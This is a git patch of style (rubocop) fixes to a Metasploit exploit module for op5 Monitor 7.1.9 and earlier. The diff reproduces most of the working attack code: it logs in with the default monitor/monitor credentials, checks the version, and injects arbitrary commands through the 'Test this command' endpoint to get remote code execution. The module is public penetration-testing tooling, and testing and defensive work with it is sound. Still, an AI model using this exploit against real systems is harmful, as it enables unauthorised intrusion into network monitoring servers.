From c2699ef194fbad04b2361ebc41d63bc6f63f83e1 Mon Sep 17 00:00:00 2001 From: h00die Date: Fri, 3 Jun 2016 17:43:11 -0400 Subject: [PATCH] rubocop fixes --- .../exploits/linux/http/op5_config_exec.rb | 101 +++++++++--------- 1 file changed, 52 insertions(+), 49 deletions(-) diff --git a/modules/exploits/linux/http/op5_config_exec.rb b/modules/exploits/linux/http/op5_config_exec.rb index 2ca4620a44..88b4a1f988 100644 --- a/modules/exploits/linux/http/op5_config_exec.rb +++ b/modules/exploits/linux/http/op5_config_exec.rb @@ -6,65 +6,68 @@ require 'msf/core' class MetasploitModule < Msf::Exploit::Remote - include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) - super(update_info(info, - 'Name' => 'op5 v7.1.9 Configuration Command Execution', - 'Description' => %q{ - op5 an open source network monitoring software. - The configuration page in version 7.1.9 and below - allows the ability to test a system command, which - can be abused to run arbitrary code as an unpriv user. - }, - 'Author' => - [ - 'h00die ', # module - 'hyp3rlinx' # discovery - ], - 'References' => - [ - [ 'URL', 'https://www.exploit-db.com/exploits/39676/' ], - [ 'URL', 'https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/'] - ], - 'License' => MSF_LICENSE, - 'Platform' => ['linux', 'unix'], - 'Privileged' => false, - 'DefaultOptions' => { 'SSL' => true }, - 'Targets' => - [ - [ 'Automatic Target', { }] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Apr 08 2016', - )) + super( + update_info( + info, + 'Name' => 'op5 v7.1.9 Configuration Command Execution', + 'Description' => %q( + op5 an open source network monitoring software. + The configuration page in version 7.1.9 and below + allows the ability to test a system command, which + can be abused to run arbitrary code as an unpriv user. + ), + 'Author' => + [ + 'h00die ', # module + 'hyp3rlinx' # discovery + ], + 'References' => + [ + [ 'EDB', '39676' ], + [ 'URL', 'https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/'] + ], + 'License' => MSF_LICENSE, + 'Platform' => ['linux', 'unix'], + 'Privileged' => false, + 'DefaultOptions' => { 'SSL' => true }, + 'Targets' => + [ + [ 'Automatic Target', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Apr 08 2016' + ) + ) register_options( [ Opt::RPORT(443), OptString.new('USERNAME', [ true, 'User to login with', 'monitor']), OptString.new('PASSWORD', [ false, 'Password to login with', 'monitor']), - OptString.new('TARGETURI', [ true, 'The path to the application', '/']), - ], self.class) + OptString.new('TARGETURI', [ true, 'The path to the application', '/']) + ], self.class + ) end - def check() + def check begin - res = send_request_cgi({ + res = send_request_cgi( 'uri' => datastore['TARGETURI'], - 'method' => 'GET', - }) + 'method' => 'GET' + ) fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? /Version: (?[\d]{1,2})\.(?[\d]{1,2})\.(?[\d]{1,2})[\s]+\|/ =~ res.body - if version_high && version_med && version_low &&\ - version_high.to_i <= 7 &&\ - version_med.to_i <= 1 &&\ + if version_high && version_med && version_low && \ + version_high.to_i <= 7 && \ + version_med.to_i <= 1 && \ version_low.to_i <= 9 - vprint_good("Version Detected: #{[version_high, version_med, version_low].join(".")}") - Exploit::CheckCode::Vulnerable + vprint_good("Version Detected: #{[version_high, version_med, version_low].join('.')}") + Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end @@ -76,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote def exploit execute_cmdstager( :flavor => :echo, - :nodelete => true, + :nodelete => true ) end @@ -85,21 +88,21 @@ class MetasploitModule < Msf::Exploit::Remote # To manually view the vuln page, click Manage > Configure > Commands. # Click the "Test this command" button to display the form we abuse. - #login + # login login_data = 'csrf_token=' login_data << "&username=#{datastore['USERNAME']}" login_data << "&password=#{datastore['PASSWORD']}" - res = send_request_cgi({ + res = send_request_cgi( 'uri' => "#{datastore['TARGETURI']}monitor/index.php/auth/login?uri=tac%2Findex", 'method' => 'POST', 'data' => login_data - }) + ) fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 302 cookie = res.get_cookies - #exploit - res = send_request_cgi({ + # exploit + res = send_request_cgi( 'uri' => "/monitor/op5/nacoma/command_test.php", 'method' => 'GET', 'cookie' => cookie, @@ -107,9 +110,9 @@ class MetasploitModule < Msf::Exploit::Remote { 'cmd_str' => cmd } - }) + ) - #success means we hang our session, and wont get back a response + # success means we hang our session, and wont get back a response if res fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Credentials need additional privileges") if res.body =~ /Access Denied/